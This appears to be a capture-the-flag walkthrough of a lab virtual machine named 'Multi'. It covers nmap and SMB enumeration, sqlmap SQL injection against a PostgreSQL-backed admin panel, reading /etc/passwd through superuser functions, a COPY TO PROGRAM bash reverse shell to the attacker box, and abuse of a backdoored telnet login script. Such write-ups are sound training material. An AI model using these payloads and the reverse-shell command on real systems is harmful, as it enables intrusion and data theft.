image-20251209193711649

First, locate the target host.

image-20251209194851558

Check the open ports.

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# cat ports.txt
# Nmap 7.94SVN scan initiated Tue Dec 9 06:46:22 2025 as: /usr/lib/nmap/nmap -p- --min-rate 10000 -oN ports.txt 192.168.56.111
Nmap scan report for 192.168.56.111
Host is up (0.00040s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
3306/tcp open mysql
28080/tcp open thor-engine
33273/tcp open unknown
34863/tcp open unknown
56189/tcp open unknown
60977/tcp open unknown
MAC Address: 08:00:27:7C:83:9F (Oracle VirtualBox virtual NIC)

# Nmap done at Tue Dec 9 06:46:24 2025 -- 1 IP address (1 host up) scanned in 2.75 seconds

Now look at the services in detail.

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# nmap -sCV -p- --min-rate 10000 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-09 06:48 EST
Nmap scan report for 192.168.56.111
Host is up (0.00045s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ssl-cert: Subject: commonName=ftp-server/organizationName=MyOrganization/stateOrProvinceName=Beijing/countryName=CN
| Not valid before: 2025-07-17T11:34:00
|_Not valid after: 2035-07-15T11:34:00
|_ssl-date: TLS randomness does not represent time
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
23/tcp open telnet Linux telnetd
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 37409/udp6 mountd
| 100005 1,2,3 40623/tcp6 mountd
| 100005 1,2,3 53305/udp mountd
| 100005 1,2,3 56189/tcp mountd
| 100021 1,3,4 33273/tcp nlockmgr
| 100021 1,3,4 37048/udp6 nlockmgr
| 100021 1,3,4 37211/tcp6 nlockmgr
| 100021 1,3,4 51459/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
2049/tcp open nfs 3-4 (RPC #100003)
3306/tcp open mysql MariaDB (unauthorized)
28080/tcp open thor-engine?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.1.3 Python/3.9.2
| Date: Tue, 09 Dec 2025 11:48:28 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 586
| Connection: close
| <!doctype html>
| <html>
| <head>
| <title>Admin Panel</title>
| <style>
| body { font-family: Arial, sans-serif; margin: 20px; }
| table { border-collapse: collapse; width: 100%; }
| border: 1px solid #ddd; padding: 8px; text-align: left; }
| background-color: #f2f2f2; }
| .error { color: red; }
| </style>
| </head>
| <body>
| <h2>Welcome</h2>
| <form method="POST" action="/">
| Username: <input name="username" required>
| <input type="submit" value="Login">
| </form>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.1.3 Python/3.9.2
| Date: Tue, 09 Dec 2025 11:48:28 GMT
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, POST, HEAD, GET
| Content-Length: 0
| Connection: close
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
33273/tcp open nlockmgr 1-4 (RPC #100021)
34863/tcp open mountd 1-3 (RPC #100005)
56189/tcp open mountd 1-3 (RPC #100005)
60977/tcp open mountd 1-3 (RPC #100005)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port28080-TCP:V=7.94SVN%I=7%D=12/9%Time=69380C8E%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,2F7,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.1\.3
SF:\x20Python/3\.9\.2\r\nDate:\x20Tue,\x2009\x20Dec\x202025\x2011:48:28\x2
SF:0GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:
SF:\x20586\r\nConnection:\x20close\r\n\r\n\n<!doctype\x20html>\n<html>\n<h
SF:ead>\n\x20\x20\x20\x20<title>Admin\x20Panel</title>\n\x20\x20\x20\x20<s
SF:tyle>\n\x20\x20\x20\x20\x20\x20\x20\x20body\x20{\x20font-family:\x20Ari
SF:al,\x20sans-serif;\x20margin:\x2020px;\x20}\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20table\x20{\x20border-collapse:\x20collapse;\x20width:\x20100%;\x2
SF:0}\n\x20\x20\x20\x20\x20\x20\x20\x20th,\x20td\x20{\x20border:\x201px\x2
SF:0solid\x20#ddd;\x20padding:\x208px;\x20text-align:\x20left;\x20}\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20th\x20{\x20background-color:\x20#f2f2f2;\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20\.error\x20{\x20color:\x20red;\x20}\
SF:n\x20\x20\x20\x20</style>\n</head>\n<body>\n\x20\x20\x20\x20<h2>Welcome
SF:</h2>\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20<form\x20metho
SF:d=\"POST\"\x20action=\"/\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20Username:\x20<input\x20name=\"username\"\x20required>\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20<input\x20type=\"submit\"\x20valu
SF:e=\"Login\">\n\x20\x20\x20\x20\x20\x20\x20\x20</form>\n\x20\x20\x20\x20
SF:\n\x20\x20\x20\x20\n\x20\x20\x20\x20\n</body>\n</html>")%r(HTTPOptions,
SF:CC,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.1\.3\x20Python/3\.
SF:9\.2\r\nDate:\x20Tue,\x2009\x20Dec\x202025\x2011:48:28\x20GMT\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20OPTIONS,\x20POST,\x
SF:20HEAD,\x20GET\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n"
SF:)%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HT
SF:ML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\.w3\.or
SF:g/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"t
SF:ext/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Error
SF:\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP/1\.0'\)
SF:\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20explanation
SF::\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x20or\x20
SF:unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n");
MAC Address: 08:00:27:7C:83:9F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
| date: 2025-12-09T11:49:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: MULTI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.69 seconds

The FTP version is fairly recent, so it is enough to check whether anonymous login is allowed.

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# ftp 192.168.56.111
Connected to 192.168.56.111.
220 (vsFTPd 3.0.3)
Name (192.168.56.111:root): anonymous
530 Permission denied.
ftp: Login failed
ftp>

Port 80 (web)

image-20251209201732643

image-20251209201811163

Port 445 (SMB)

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# enum4linux -a 192.168.56.111
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Dec 9 07:35:23 2025

=========================================( Target Information )=========================================

Target ........... 192.168.56.111
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


===========================( Enumerating Workgroup/Domain on 192.168.56.111 )===========================


[+] Got domain/workgroup name: SECUREGROUP


===============================( Nbtstat Information for 192.168.56.111 )===============================

Looking up status of 192.168.56.111
MULTI <00> - B <ACTIVE> Workstation Service
MULTI <03> - B <ACTIVE> Messenger Service
MULTI <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
SECUREGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
SECUREGROUP <1d> - B <ACTIVE> Master Browser
SECUREGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

==================================( Session Check on 192.168.56.111 )==================================


[+] Server 192.168.56.111 allows sessions using username '', password ''


===============================( Getting domain SID for 192.168.56.111 )===============================

Domain Name: SECUREGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


==================================( OS information on 192.168.56.111 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 192.168.56.111 from srvinfo:
MULTI Wk Sv PrQ Unx NT SNT Secure Samba Server
platform_id : 500
os version : 6.1
server type : 0x809a03


======================================( Users on 192.168.56.111 )======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

================================( Share Enumeration on 192.168.56.111 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

Sharename Type Comment
--------- ---- -------
secure_share Disk
IPC$ IPC IPC Service (Secure Samba Server)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.56.111 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.56.111

//192.168.56.111/secure_share Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.111/IPC$ Mapping: N/A Listing: N/A Writing: N/A

===========================( Password Policy Information for 192.168.56.111 )===========================


[E] Unexpected error from polenum:



[+] Attaching to 192.168.56.111 using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'")

[+] Trying protocol 445/SMB...

[!] Protocol failed: SMB SessionError: STATUS_NOT_SUPPORTED(The request is not supported.)



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


======================================( Groups on 192.168.56.111 )======================================


[+] Getting builtin groups:


[+] Getting builtin group memberships:


[+] Getting local groups:


[+] Getting local group memberships:


[+] Getting domain groups:


[+] Getting domain group memberships:


=================( Users on 192.168.56.111 via RID cycling (RIDS: 500-550,1000-1050) )=================


[I] Found new SID:
S-1-22-1

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\todd (Local User)
S-1-22-1-1001 Unix User\xiao (Local User)
S-1-22-1-1002 Unix User\secure_user (Local User)
S-1-22-1-1003 Unix User\samba_user (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-2648146443-3642655822-4195795931 and logon username '', password ''

S-1-5-21-2648146443-3642655822-4195795931-501 MULTI\nobody (Local User)
S-1-5-21-2648146443-3642655822-4195795931-513 MULTI\None (Domain Group)

==============================( Getting printer info for 192.168.56.111 )==============================

No printers returned.


enum4linux complete on Tue Dec 9 07:35:55 2025

Two key findings:

A list of valid usernames:

S-1-22-1-1000 Unix User\todd (Local User)
S-1-22-1-1001 Unix User\xiao (Local User)
S-1-22-1-1002 Unix User\secure_user (Local User)
S-1-22-1-1003 Unix User\samba_user (Local User)

and a readable share:

//192.168.56.111/secure_share Mapping: OK Listing: OK Writing: N/A

image-20251209210007377

The share's contents appear to be related to bettercap, but there is nothing usable in them yet.

Move on to testing the next port.

NFS

image-20251209210355692

This NFS export is configured to allow mounts only from the local host (localhost/127.0.0.1); showmount -e 192.168.56.111 lists the export together with the hosts allowed to mount it.

Port 28080 (Python/Werkzeug web service)

image-20251209210750969

Any username at all logs in; inside there is a user lookup function.

Looking up the users found through SMB, only xiao returns any information.

image-20251209211018505

The lookup has a SQL injection vulnerability. The captured POST request is saved in a file named 1 and handed to sqlmap with -r:

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -dbs
___
__H__
___ ___[)]_____ ___ ___ {1.8.9#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:24:27 /2025-12-09/

[08:24:27] [INFO] parsing HTTP request from '1'
[08:24:27] [INFO] resuming back-end DBMS 'postgresql'
[08:24:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: keyword=1';SELECT PG_SLEEP(5)--

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:24:27] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:24:27] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[08:24:27] [INFO] fetching database (schema) names
[08:24:28] [WARNING] reflective value(s) found and filtering out
[08:24:28] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[08:24:28] [WARNING] the SQL query provided does not return any output
[08:24:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:24:28] [INFO] fetching number of databases
[08:24:28] [WARNING] time-based comparison requires larger statistical model, please wait.......................... (done)
[08:24:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[08:24:58] [INFO] adjusting time delay to 1 second due to good response times
3
[08:24:58] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)

[08:24:59] [INFO] retrieved:
[08:24:59] [INFO] retrieved:
[08:24:59] [INFO] falling back to current database
[08:24:59] [INFO] fetching current database
[08:24:59] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] public

[08:24:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:24:59] [WARNING] your sqlmap version is outdated

[*] ending @ 08:24:59 /2025-12-09/


The public schema

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -D public --tables

[*] starting @ 08:27:41 /2025-12-09/

[08:27:41] [INFO] parsing HTTP request from '1'
[08:27:41] [INFO] resuming back-end DBMS 'postgresql'
[08:27:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: keyword=1';SELECT PG_SLEEP(5)--

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:27:41] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:27:41] [INFO] fetching tables for database: 'public'
[08:27:41] [WARNING] reflective value(s) found and filtering out
Database: public
[1 table]
+-------+
| users |
+-------+

[08:27:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:27:41] [WARNING] your sqlmap version is outdated

[*] ending @ 08:27:41 /2025-12-09/


The users table

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -D public -T users --columns

[*] starting @ 08:28:34 /2025-12-09/

[08:28:34] [INFO] parsing HTTP request from '1'
[08:28:34] [INFO] resuming back-end DBMS 'postgresql'
[08:28:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: keyword=1';SELECT PG_SLEEP(5)--

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:28:34] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:28:34] [INFO] fetching columns for table 'users' in database 'public'
[08:28:34] [WARNING] reflective value(s) found and filtering out
Database: public
Table: users
[3 columns]
+----------+------+
| Column | Type |
+----------+------+
| email | text |
| id | int4 |
| username | text |
+----------+------+

[08:28:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:28:34] [WARNING] your sqlmap version is outdated

[*] ending @ 08:28:34 /2025-12-09/


Three columns: text, int4, text.

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -D public -T users --dump


[*] starting @ 08:41:40 /2025-12-09/

[08:41:40] [INFO] parsing HTTP request from '1'
[08:41:40] [INFO] resuming back-end DBMS 'postgresql'
[08:41:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: keyword=1';SELECT PG_SLEEP(5)--

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:41:40] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:41:40] [INFO] fetching columns for table 'users' in database 'public'
[08:41:40] [INFO] fetching entries for table 'users' in database 'public'
[08:41:40] [WARNING] reflective value(s) found and filtering out
Database: public
Table: users
[4 entries]
+----+-----------------+----------+
| id | email | username |
+----+-----------------+----------+
| 1 | admin@multi.hmv | admin |
| 2 | guest@multi.hmv | guest |
| 3 | test@multi.hmv | test |
| 4 | xiao@multi.hmv | xiao |
+----+-----------------+----------+

[08:41:40] [INFO] table 'public.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.111/dump/public/users.csv'
[08:41:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:41:40] [WARNING] your sqlmap version is outdated

[*] ending @ 08:41:40 /2025-12-09/

Now it is clear why only xiao could be found: it is simply a coincidence that xiao is the only name present both in the SMB user list and in this table.

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword --is-dba

[*] starting @ 08:46:36 /2025-12-09/

[08:46:36] [INFO] parsing HTTP request from '1'
[08:46:36] [INFO] resuming back-end DBMS 'postgresql'
[08:46:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: keyword=1';SELECT PG_SLEEP(5)--

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:46:36] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:46:36] [INFO] testing if current user is DBA
current user is DBA: True
[08:46:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:46:36] [WARNING] your sqlmap version is outdated

[*] ending @ 08:46:36 /2025-12-09/


We hold the highest database privilege: DBA, i.e. PostgreSQL superuser.

image-20251209215054238

But sqlmap still cannot execute system commands, and

sqlmap -r 1 -p keyword --file-read "/etc/passwd"

fails as well.

Reason:

sqlmap's automated routines run into a compatibility problem on PostgreSQL 13 (for command execution it tries the old approach of uploading a UDF .so built for older Postgres releases, which does not work on Postgres 13). The queries below need nothing beyond the superuser's own built-in functions, so they work regardless.

sqlmap -r 1 --batch --technique=U -p keyword --sql-query "SELECT pg_read_file('/etc/passwd', 0, 1000000)"

This reads the file directly (pg_read_file is superuser-only by default, which is exactly what the DBA result above gives us).

image-20251209220722848

There is another method that is less likely to be restricted: import the file as a large object, then read the object.

sqlmap -r 1 -p keyword --sql-query "SELECT lo_import('/etc/passwd')"

image-20251209220857108

# replace 41022 with the OID actually returned by lo_import
sqlmap -r 1 -p keyword --sql-query "SELECT lo_get(41022)"

image-20251209221205017
The result is just the file's bytes as a hex-encoded bytea (shown as \x...); hex-decode it and the text is readable. The interesting /etc/passwd entries:

xiao (UID 1001): xiao:x:1001:1001::/home/xiao:/bin/bash

A normal user with /bin/bash, so able to log in to a shell.

todd (UID 1000): todd:x:1000:1000:,,,:/home/todd:/bin/bash

Also a user who can log in.

secure_user (UID 1002): secure_user:x:1002:1002::/home/secure_user:/bin/bash

Also has a login shell.

postgres (UID 112): postgres:x:112:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

The database account has a login shell too, which means that if a reverse shell succeeds we land as the postgres user.

image-20251209222133121

The users' SSH keys cannot be read this way (server-side reads run as the postgres OS user, so anything it cannot read, such as other users' ~/.ssh, is out of reach).

But as superuser we can execute operating-system commands through COPY ... TO PROGRAM, which is enough to drop and run a reverse shell script (192.168.56.112 is the attacking Kali box):

';COPY (SELECT $$_$$) TO PROGRAM 'echo "bash -i >& /dev/tcp/192.168.56.112/4444 0>&1" > /tmp/rev.sh';--
';COPY (SELECT $$_$$) TO PROGRAM 'chmod +x /tmp/rev.sh';--
';COPY (SELECT $$_$$) TO PROGRAM '/bin/bash /tmp/rev.sh';--

image-20251209223948471

Shell obtained.

image-20251209224442070

A key piece of information turns up in the shell history:

echo 'ENABLE_BACKDOOR' > /etc/default/telnet

So Telnet has a backdoor.

Review the custom login script:

postgres@Multi:/var/lib/postgresql$ cat /usr/local/bin/custom_login        
cat /usr/local/bin/custom_login
#!/bin/bash

printf "Username: \r\n"
read -r username
username=$(echo "$username" | tr -d '\r\n' | tr -s ' ')

if [[ -z "$username" ]]; then
printf "invalid username\r\n"
sleep 1
exit 1
fi

printf "Password: \r\n"
read -s -r password
password=$(echo "$password" | tr -d '\r\n')

if [[ "$username" == "xiao" ]] && [[ -z "$password" ]]; then
if grep -q "ENABLE_BACKDOOR" /etc/default/telnet 2>/dev/null; then
printf "login successful\r\n"
exec /bin/login -f xiao
exit 0
else
printf "backdoor disabled\r\n"
sleep 1
exit 1
fi
fi

if [[ "$username" == "xiao" ]] && [[ -n "$password" ]]; then
printf "invalid password\r\n"
sleep 1
exit 1
fi

printf "login failed\r\n"
sleep 1
exit 1
postgres@Multi:/var/lib/postgresql$

Overall: logging in over Telnet as xiao with an empty password goes straight to a shell (exec /bin/login -f xiao), but only if /etc/default/telnet contains the string ENABLE_BACKDOOR. Any non-empty password for xiao, and any other username, is rejected.

Login fails:

image-20251210185320017

The backdoor is not active: the command from the history,

echo 'ENABLE_BACKDOOR' > /etc/default/telnet

did not leave ENABLE_BACKDOOR saved in the file, so we have to run that command again ourselves.

image-20251210185724646

image-20251210190250168

image-20251210190344288

A password file was found in the pub directory discovered by the directory scan, but our current user cannot read it; www-data is needed. Writing a web shell into the web directory takes care of that.

image-20251210191154398

This yields a password.

It is todd's password.

image-20251210192742068

Let's take a look.

cupp, a wordlist generator.

Logic flaw + environment misconfiguration + man-in-the-middle attack

image-20251210200252666

